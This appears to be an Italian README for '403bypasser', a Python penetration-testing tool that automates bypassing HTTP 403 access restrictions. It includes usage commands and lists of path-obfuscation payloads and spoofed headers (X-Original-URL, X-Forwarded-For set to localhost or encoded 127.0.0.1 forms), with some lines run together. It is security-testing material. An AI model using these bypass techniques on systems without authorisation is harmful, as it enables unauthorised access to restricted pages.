
Automatizza le tecniche di bypass del controllo di accesso HTTP 403 utilizzando manipolazione degli header, offuscamento del percorso e conversione del metodo HTTP per il test di sicurezza delle applicazioni web.

403bypasser automatizza le tecniche utilizzate per aggirare le restrizioni di controllo degli accessi sulle pagine di destinazione. Questo strumento continuerà ad essere sviluppato ed è aperto ai contributi.
403bypasser automatizza le tecniche utilizzate per aggirare le restrizioni di controllo degli accessi sulle pagine di destinazione. 403bypasser continuerà ad essere migliorato ed è aperto ai contributi.
git clone https://github.com/yunemse48/403bypasser.gitpip install -r requirements.txtArgomenti:
Utilizzo 1: python3 403bypasser.py -u https://example.com -d /secret
Utilizzo 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
Utilizzo 3: python3 403bypasser.py -U urllist.txt -d /secret
Utilizzo 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
NOTA IMPORTANTE: Tutti i seguenti sono interpretati allo stesso modo. Pertanto, quale pattern usare è solo una questione di preferenza.
python3 403bypasser.py -u https://example.com -d secretpython3 403bypasser.py -u https://example.com -d /secretpython3 403bypasser.py -u https://example.com -d /secret/python3 403bypasser.py -u https://example.com -d secret/python3 403bypasser.py -u https://example.com/ -d secretPoiché Python è un linguaggio multipiattaforma, è possibile eseguire questo programma su diversi sistemi operativi.
L'output del programma viene salvato (nella directory corrente) in un file con il nome del dominio fornito come input.
Ad esempio:
Viene dato python3 403bypasser.py -u https://example.com -d /secret. Quindi l'output viene salvato in example.txt nella directory corrente.
Modifiche in v2.0: Sono state apportate modifiche considerevoli in questa versione. Il progetto è stato completamente spostato da Bash a Python 3. Sono state aggiunte tecniche nuove e di vario tipo.
Modifiche in v1.1: Ora è possibile passare file (elenchi) a 403bypasser come input tramite argomenti. Inoltre, sono stati aggiunti due casi di test:
avvelenamento con gli header 1) X-Original-URL e 2) X-Rewrite-URL.
/%2e/secret/secret//secret..;//secret/..;//secret%20/secret%09/secret%00/secret.json/secret.css/secret.html/secret?/secret??/secret???/secret?testparamX-Original-URL: /secretX-Rewrite-URL: /secretHeader:
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IPValori:
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0| Argomento | Descrizione | Esempi | Nota |
|---|
| -u | singolo URL da scansionare | http://example.com o http://example.com/ | Tutti questi esempi di utilizzo sono interpretati allo stesso modo |
| -U | percorso di un elenco di URL | ./urllist.txt, ../../urllist.txt, ecc. | Basta fornire il percorso in cui si trova il file :) |
| -d | singola directory da scansionare | admin o /admin o admin/ o /admin/ | Tutti questi esempi di utilizzo sono interpretati allo stesso modo |
| -D | percorso di un elenco di directory | ./dirlist.txt, ../../dirlist.txt, ecc. | Basta fornire il percorso in cui si trova il file :) |
/secret#/secret#test/secret/.//secret///./secret/./172.16.0.1192.168.1.0192.168.1.1